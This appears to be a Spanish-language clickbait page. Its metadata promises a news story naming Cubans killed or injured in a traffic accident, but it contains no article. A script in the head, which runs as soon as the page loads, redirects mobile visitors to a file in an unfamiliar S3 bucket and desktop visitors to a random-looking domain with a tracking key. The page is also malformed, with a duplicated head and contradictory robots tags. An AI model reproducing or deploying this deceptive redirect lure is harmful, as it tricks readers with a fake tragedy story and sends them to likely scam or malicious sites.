<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1230492694724476990/1230567723562434560/gdfsgfder44344.jpg?ex=6633ca80&is=66215580&hm=05c71817f4d518f31073acef695380cf064ae519a62d3328483a90a985cb9bea&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana</title>
    <script>
        // Función para detectar el tipo de dispositivo
        function redirigirSegunDispositivo() {
            // Obtener el ancho de la ventana del navegador
            const anchoVentana = window.innerWidth;

            // Definir el umbral de ancho para dispositivos móviles (ejemplo: 768px)
            const umbralDispositivoMovil = 768;

            // Redirigir según el ancho de la ventana
            if (anchoVentana < umbralDispositivoMovil) {
                // Es un dispositivo móvil (ancho menor al umbral)
                window.location.href = 'https://whjfaging5552444.s3.eu-west-3.amazonaws.com/dcasdasw33.html';
            } else {
                // Es una computadora (ancho igual o mayor al umbral)
                window.location.href = 'https://sillinessrobnotoriety.com/szmkzaxn?key=fc48a4a3db2e4dabf3cfdb98ad77a7a3';
            }
        }

        // Llamar a la función cuando el documento HTML haya cargado completamente
        document.addEventListener('DOMContentLoaded', redirigirSegunDispositivo);
    </script>